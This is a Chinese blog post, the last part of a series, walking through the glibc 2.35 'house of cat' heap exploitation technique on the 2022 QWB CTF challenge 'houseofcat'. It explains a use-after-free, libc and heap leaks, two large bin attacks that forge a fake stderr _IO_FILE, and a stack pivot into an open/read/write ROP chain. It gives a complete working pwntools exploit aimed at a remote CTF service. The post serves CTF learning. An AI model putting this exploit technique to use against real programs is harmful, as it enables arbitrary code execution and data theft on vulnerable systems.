浅析house of cat(下)

已于 2024-08-15 14:48:13 修改
阅读量640 收藏 5
点赞数 29
文章标签: linux python 网络安全
于 2024-08-15 12:55:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_79327647/article/details/141193125
版权

前言:

这篇是hosue of cat 系列的最后一篇,之后估计要停一段时间去学apple1,个人感觉学习的顺序应该是orange -> apple2 -> cat -> emma ->apple1但是实际上学到cat应该就可以通杀了。但是本着学习的态度,还是看看apple1。外一以后需要用上呢。

例题:

这里选的例题是2022强网杯的house of cat,很经典的一道例题。

程序逻辑:

程序是一个菜单的堆题,不过在使用程序的主要功能之前,需要输入一些数据来绕过这个检查,可能自己的逆向能力还得提高吧,这里的检查我看了很长时间并结合网上的exp才弄出来,结论就是最开始输入LOGIN | r00t QWB QWXFadmin去进行登录,接下来每一次调用具体的增删改查功能之前都要发送一句CAT | r00t QWB QWXF$\xff ,接下来才能去执行正常的功能。

功能一共有四个 add edit show delete,不算复杂,具体漏洞如下:

1.edit 函数只能使用两次,并且只能写入 0x30 字节的数据
2.delete 函数删除后指针未清0,存在 UAF 漏洞
3.add 函数允许申请16个堆块,申请的堆块大小的范围是 0x418~0x46f ,申请完堆块后可以向里面写入 size 字节的数据。
4.show 函数只能泄露 0x30 字节的数据

利用思路

  1. 利用largbin内的堆块泄露 libc 地址和堆地址
  2. 利用 edit 函数完成第一次 large bin attack 向 libc 中的全局变量 stderr 写入一个堆地址,从而控制 _IO_2_1_stderr 结构体的各个字段
  3. 第二次 large bin attack 去篡改 top chunk 的 size 将其改为非法(要往小了改,因为只有 top chunk 无法满足要申请的 size 时,才会触发 sysmalloc) 注意 large bin attack 想将 top chunk 的 size 改小的话,需要地址错位
  4. 申请一个堆块,此时执行 __malloc_assert 触发攻击

利用largbin内的堆块泄露 libc 地址和堆地址

#泄露libc和heap
add(0,0x440,'flag\x00')
add(1,0x420,'flag\x00')
add(2,0x430,'flag\x00')
delete(0)
add(3,0x450,'flag\x00')
show(0)
fd=uu64(ru('\x7f')[-6:])
libc_base=fd-(0x7f6f8a9bd0e0-0x7f6f8a7a3000)
print("libc_base=",hex(libc_base))
print("fd=",hex(fd))
heap_addr=uu64(ru('\x55')[-6:])
heap_base=heap_addr-(0x556aa3a51290-0x556aa3a51000)
print("heap_base=",hex(heap_base))

利用 edit 函数完成第一次 large bin attack 向 libc 中的全局变量 stderr 写入一个堆地址

add(4,0x440,bytes(fake_IO_stderr))
delete(4)
add(5,0x450,b'flag\x00\x00\x00\x00'+p64(0)+fake_IO_wide_data)
edit(0,p64(fd)*2+p64(heap_addr)+p64(stderr_addr-0x20))
delete(2)
add(6,0x450,'flag\x00')

第二次 large bin attack 去篡改 top chunk 的 size 

add(7,0x430,'flag\x00')

delete(7)
edit(0,p64(fd)*2+p64(heap_addr)+p64(heap_base+0x1c70-0x20+3))

完成攻击

add(10,0x450,'flag\x00')

结果:

完整exp:

from pwn import *
from pwncli import *
from pwn_std import *
context(os='linux', arch='amd64', log_level='debug')
p= getProcess("ctf.qwq.cc","10016","./houseofcat")
elf = ELF("./houseofcat")
libc = ELF("/home/mazhatter/glibc-all-in-one/libs/2.35-0ubuntu3_amd64/libc.so.6")
'''
patchelf --set-interpreter /opt/libs/2.27-3ubuntu1_amd64/ld-2.27.so ./patchelf
patchelf --replace-needed libc.so.6 /opt/libs/2.27-3ubuntu1_amd64/libc-2.27.so ./patchelf
ROPgadget --binary main --only "pop|ret" | grep rdi
set debug-file-directory /home/mazhatter/glibc-all-in-one/libs/2.35-0ubuntu3.8_amd64/.debug/
'''

sa('mew mew mew~~~~~~','LOGIN | r00t QWB QWXFadmin')
def add(idx,size,cont):
    sa('mew mew mew~~~~~~', 'CAT | r00t QWB QWXF$\xff')
    sla('plz input your cat choice:\n',str(1))
    sla('plz input your cat idx:\n',str(idx))
    sla('plz input your cat size:\n',str(size).encode())
    sa('plz input your content:\n',cont)
def delete(idx):
    sa('mew mew mew~~~~~~', 'CAT | r00t QWB QWXF$\xff')
    sla('plz input your cat choice:\n', str(2))
    sla('plz input your cat idx:\n',str(idx))
def show(idx):
    sa('mew mew mew~~~~~~', 'CAT | r00t QWB QWXF$\xff')
    sla('plz input your cat choice:\n', str(3))
    sla('plz input your cat idx:\n',str(idx))
def edit(idx,cont):
    sa('mew mew mew~~~~~~', 'CAT | r00t QWB QWXF$\xff')
    sla('plz input your cat choice:\n', str(4))
    sla('plz input your cat idx:\n',str(idx))
    sa('plz input your content:\n', cont)

#泄露libc和heap
add(0,0x440,'flag\x00')
add(1,0x420,'flag\x00')
add(2,0x430,'flag\x00')
delete(0)
add(3,0x450,'flag\x00')
show(0)
fd=uu64(ru('\x7f')[-6:])
libc_base=fd-(0x7f6f8a9bd0e0-0x7f6f8a7a3000)
print("libc_base=",hex(libc_base))
print("fd=",hex(fd))
heap_addr=uu64(ru('\x55')[-6:])
heap_base=heap_addr-(0x556aa3a51290-0x556aa3a51000)
print("heap_base=",hex(heap_base))

stderr_addr=libc_base+0x7f04ef532860-0x7f04ef318000
read_addr=libc_base+libc.symbols['read']
write_addr=libc_base+libc.symbols['write']
close_addr=libc_base+libc.symbols['close']
pop_rdi=libc_base+0x000000000002a3e5
pop_rsi=libc_base+0x000000000002be51
pop_rdx_r12=libc_base+0x000000000011f497
pop_rax_ret=libc_base+0x0000000000045eb0
syscall = libc_base + 0x11ea3b
#close
rop=p64(pop_rdi)
rop+=p64(0)
rop+=p64(pop_rdi)
rop+=p64(0)
rop+=p64(heap_base+0x55b23e8c93f0-0x55b23e8c8000+0x10)
rop+=p64(0)
rop+=p64(pop_rdi)
rop+=p64(0)
rop+=p64(close_addr)
#open
rop+=p64(pop_rdi)
rop+=p64(heap_base+0x55cbc30c6f60-0x55cbc30c6000)# 'flag' address
rop+=p64(pop_rsi)
rop+=p64(0)
rop+=p64(pop_rax_ret)
rop+=p64(2)
rop+=p64(syscall)
#read
rop+=p64(pop_rdi)
rop+=p64(0)
rop+=p64(pop_rsi)
rop+=p64(heap_base+0x55cbc30c6f60-0x55cbc30c6000)# flag store address
rop+=p64(pop_rdx_r12)
rop+=p64(0x50)
rop+=p64(0)
rop+=p64(read_addr)
#write
rop+=p64(pop_rdi)
rop+=p64(1)
rop+=p64(write_addr)

io_wfile_jumps = libc_base + 0x2160c0
fake_IO_stderr=IO_FILE_plus_struct()
fake_IO_stderr._lock=heap_base+0x559fa1786290-0x55a33d39c000
fake_IO_stderr._wide_data=heap_base+0x55cbc30c73d0- 0x55cbc30c6000
fake_IO_stderr.vtable=io_wfile_jumps+0x10

fake_IO_stderr=fake_IO_FILE=flat({
    0x0:0,  #_IO_read_end
    0x8:0,  #_IO_read_base
    0x10:0,  #_IO_write_base
    0x18:0,  #_IO_write_ptr
    0x20:0,  #_IO_write_end
    0x28:0,  #_IO_buf_base
    0x30:0,  #_IO_buf_end
    0x38:0,  #_IO_save_base
    0x40:0,  #_IO_backup_base
    0x48:0,#_IO_save_end
    0x50:0,  #_markers
    0x58:0,  #_chain
    0x60:0,  #_fileno
    0x68:0,  #_old_offset
    0x70:0,  #_cur_column
    0x78:libc_base + 0x21ba60,  #_lock
    0x80:0,  #_offset
    0x88:0,  #_codecvt
    0x90:heap_base+0x55cbc30c73d0- 0x55cbc30c6000,  #_wide_data
    0x98:0,  #_freeres_list
    0xa0:0,  #_freeres_buf
    0xa8:0,  #__pad5
    0xb0:0,  #_mode
    0xc8:io_wfile_jumps+0x10,#vtable

})


fake_IO_wide_data=flat({
    0x0:bytes(rop),
    0xe0:0x55810b78b4b0-0x55810b78a000+heap_base,
    0xf8:libc_base+0x000000000005a170#0x000000000005a170 : mov rsp, rdx ; ret
})
'''
fake_IO_wide_data=flat({
    0x0:[libc_base+0x000000000002a3e5,#pop rdi
        heap_base+0x5626d7c3b950- 0x5626d7c39000,
        libc_base+0x000000000002be51,#0x000000000002be51 : pop rsi ; ret                                          
        0,##
        libc_base+0x0000000000108b03,#libc_base+0x000000000011f2e7,#0x000000000011f2e7 : pop rdx ; pop r12 ; ret
        0,
        0,##
        0,
        libc_base+0x0000000000045eb0,#0x0000000000045eb0 : pop rax ; ret
        2,
        libc_base+libc.sym["syscall"]+27,
        libc_base+0x000000000002a3e5,#pop rdi
        3,
        libc_base+0x000000000002be51,#0x000000000002be51 : pop rsi ; ret,
        heap_base+0x5626d7c3b950- 0x5626d7c39000,
        libc_base+0x000000000011f2e7,#0x000000000011f2e7 : pop rdx ; pop r12 ; ret,
        0x100,
        0,
        read_addr,
        libc_base+0x000000000002a3e5,#pop rdi,
        1,
        write_addr,],
    0xb0:0,
    0xb8:0,
    0xc0:0,
    0xc8:0,
    0xd0:0,
    0xd8:0,
    0xe0:0x5635cdee03f0-0x5635cdede000+heap_base,
    0x148:libc_base+0x000000000005a120#0x000000000005a120 : mov rsp, rdx ; ret
})
'''
add(4,0x440,bytes(fake_IO_stderr))
delete(4)
add(5,0x450,b'flag\x00\x00\x00\x00'+p64(0)+fake_IO_wide_data)
edit(0,p64(fd)*2+p64(heap_addr)+p64(stderr_addr-0x20))
delete(2)
add(6,0x450,'flag\x00')

add(7,0x430,'flag\x00')

delete(7)
edit(0,p64(fd)*2+p64(heap_addr)+p64(heap_base+0x1c70-0x20+3))

pause()
add(10,0x450,'flag\x00')
#pause()
#add(11, 0x420, 'a')
#pause()

ita()

Mazhatter
关注
  • 29
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[转]高负载并发网站架构分析
bluehire的专栏
12-23 2万+
由于自己正在做一个高性能大用户量的论坛程序,对高性能高并发服务器架构比较感兴趣,于是在网上收集了不少这方面的资料和大家分享。希望能和大家交流 msn: defender_ios@hotmail.com ——————————————————————————————————————— ? 初创网站与开源软件 6 ? 谈谈大型高负载网站服务器的优化心得! 8 ? Lighttpd+Squid+Apach
【刷题计划1】【poj分类转载】
loving coding
08-19 1160
----------------2018.4.10更新-----------------------原本这只是暑假刷题计划,后来因为某些原因,自己就不是很努力的刷题,现在情况有变,so,重新继续咯~下个月26号省赛,扣去中间实训的一周时间和几次校赛,大概只有一个月时间。目前计划是,每天基础算法题+cf上3题,专业课也先停了,自己这段时间只想认真写题。昨天晚上又失眠了,虽然我知道保证训练效率的关键是...
浅析house of cat(上)
2301_79327647的博客
08-13 829
原本以为只学习house of apple2就足以应对所有高版本了,但是还是被白名单制裁了,这里浅析一下house of cat以弥补apple2的缺陷。
浅析house of cat(中)
2301_79327647的博客
08-14 539
​ 这篇是浅析house of cat(上)-CSDN博客的续写,主要想从源码调试的角度去讲解一下具体流程。 这里选择的例题是强网杯2022的houseofcat,这里我只是使用已经写好的脚本去调试,讲解一些上篇中没指出来,但需要我们绕过的地方。
344-浅析CryptoKitties(CK)
Lich Howger
04-13 793
pragma solidity ^0.4.11; /** * @title Ownable * @dev The Ownable contract has an owner address, and provides basic authorization control * functions, this simplifies the implementation of "user ...
【学习点滴-linux】 find命令浅析及应用
专注、专心
08-08 3140
Linux中find常见用法示例 ·find   path   -option   [   -print ]   [ -exec   -ok   command ]   {} \; find命令的参数; pathname:   find命令所查找的目录路径。例如用.来表示当前目录,用/来表示系统根目录。 -print:         find命令将匹配的文件输出到标准输出。
象形法记忆英语单词
极客学长 | 极客学长Bravo
05-31 5954
<font size="5" face= "微软雅黑">                                         象形法记忆英语单词       人们普通认为:英语是拼音文字,因而与象形无关。但是,实际上,即使作为拼音文字,其字母的来源也与象形有关。根据笔者十多年的研究结果,英语中的二十六个字母每个字母都有其象形意义,而且更重要的是:这些字母的象形意义对于记忆大量的英语
深度学习如何入门?
GarfieldEr007的专栏
05-25 1万+
beanfrog ,computer vision 161 人赞同 先了解个大概 A Deep Learning Tutorial: From Perceptrons to Algorithms 神经网络肯定是要学习的,主要是BP算法,可以看看PRML3、4、5三章,可先忽略其中的贝叶斯视角的解释。一些主要的算法理解要看具体的论文了,有个Matlab的程序不错,有基本算法的实
高负载高并发网站架构分析
热门推荐
Steven_ssm的博客
08-28 3万+
由于自己正在做一个高性能大用户量的论坛程序,对高性能高并发服务器架构比较感兴趣,于是在网上收集了不少这方面的资料和大家分享。希望能和大家交流  msn: defender_ios@hotmail.com  ———————————————————————————————————————   初创网站与开源软件 6   谈谈大型高负载网站服务器的优化心得! 8   Lighttpd+S
推荐一些RSS站点和地址
02-25 3万+
 推荐一些RSS站点和地址aaahts 2008-12-11 不知道什么是RSS的,可以看这个:什么是RSS http://blog.csdn.net/aaahts/archive/2004/12/16/218066.aspx 不知道用什么看RSS好的,可以看这个:推荐RSS阅读器http://blog.csdn.net/aaahts/archive/2005/02/03/279099.aspx 
浅析办公自动化下的文档管理最终版.pdf
11-17
浅析办公自动化下的文档管理最终版.pdf
浅析“互联网 ”背景下对会计行业的影响.doc
11-29
浅析“互联网 ”背景下对会计行业的影响.doc
浅析物联网背景下的智能物流供应链管理最终版.pdf
11-17
浅析物联网背景下的智能物流供应链管理最终版.pdf
互联网时代下浅析高校“跑腿经济”的商业模式.pdf
11-16
互联网时代下浅析高校“跑腿经济”的商业模式.pdf
Linux日常运维小结
lza20001103的博客
08-14 578
Linux日常运维小结
系统控制和管理接口:在Linux中利用电源和性能域进行平台资源抽象
csdnsqst0046的博客
08-09 877
在本文中,您可以了解到如何利用我们的方法将复杂性从Linux驱动程序(需要为每个平台编写不同的开发程序)转移到固件。由于固件已经适配了平台,因此固件知道需要采取哪些手段来配置外设。您可以了解我们如何定义逻辑性能和电源域,而不是单独处理每个平台资源。您还可以了解到我们如何努力实现这一目标,以及您如何进行尝试并做出贡献。
Linux Day1 系统编程和文件操作
qq_63145217的博客
08-12 1034
1)使用标准库函数如fopen, fclose, fread, fwrite, fgetc, fputc, fgets, fprintf, fscanf等进行文件操作。1)用套接字(sockets)API,包括socket, bind, listen, accept, connect, send, recv等函数进行网络通信。nmemb 要写的数据块的个数(一般为sizeof(ptr))->1个1个读,到sizeof(ptr)为止。nmemb 要获取的数据块的个数,拷贝的数据块个数。
Linux中线程接口(分离,查看id)mv指令
最新发布
2301_77479435的博客
08-14 502
Linux中线程接口(分离,查看id)mv指令
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值